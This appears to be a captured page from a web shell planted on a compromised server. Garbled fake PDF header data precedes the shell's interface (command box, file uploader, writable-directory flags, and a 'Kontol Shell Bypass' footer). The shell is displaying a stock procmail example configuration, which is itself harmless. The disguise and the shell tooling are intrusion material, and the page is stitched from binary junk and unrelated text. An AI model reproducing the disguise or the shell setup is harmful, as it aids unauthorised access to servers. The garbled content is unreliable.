%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/procmail/examples/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/procmail/examples/3procmailrc
# Please check if all the paths in PATH are reachable, remove the ones that
# are not.

PATH=$HOME/bin:/usr/bin:/global/bin:/usr/ucb:/bin:/usr/local/bin:
MAILDIR =	$HOME/Mail	# You'd better make sure it exists
DEFAULT =	$MAILDIR/mbox
LOGFILE =	$MAILDIR/from
LOCKFILE=	$HOME/.lockmail

			# This will create a local lockfile named todd.lock
:0:			# *if* the condition matches
* ^From.*thf
todd

LOCKFILE=$MAILDIR/whatever	# This will remove the global lockfile
				# $HOME/.lockmail and the new lockfile
				# will be $MAILDIR/whatever


				# The next recipe will
				# filter out all messages from "at"
				# jobs and will put them in a terse format
				# (only the date and the body) in
				# a file called $MAILDIR/atjunk
:0 fh
* ^From root
* ^Subject: Output from "at" job
|egrep "^Date:"
				# The next recipe will only be used if
				# the previous one matched
:0 A
atjunk



MAILDIR=$HOME/News	# This will change the current directory


			# The next recipe will create a local lockfile
			# named $HOME/News/dustbin.lock (*if* the condition
			# matches), and will feed the body of the message
			# through `sort` (sorry, couldn't come up with anything
			# better :-), after which the result will be
			# appended to $HOME/News/dustbin
:0 b:
* ^Subject:.*rubbish
|sort >>dustbin

			# The next recipe will use the games directory as a MH
			# folder (of course you need MH to read the mail then)
:0
* ^Subject:.*games
games/.

# Anything not delivered by now will go to $HOME/Mail/mbox
# Using LOCKFILE=$HOME/Mail/mbox.lock

Kontol Shell Bypass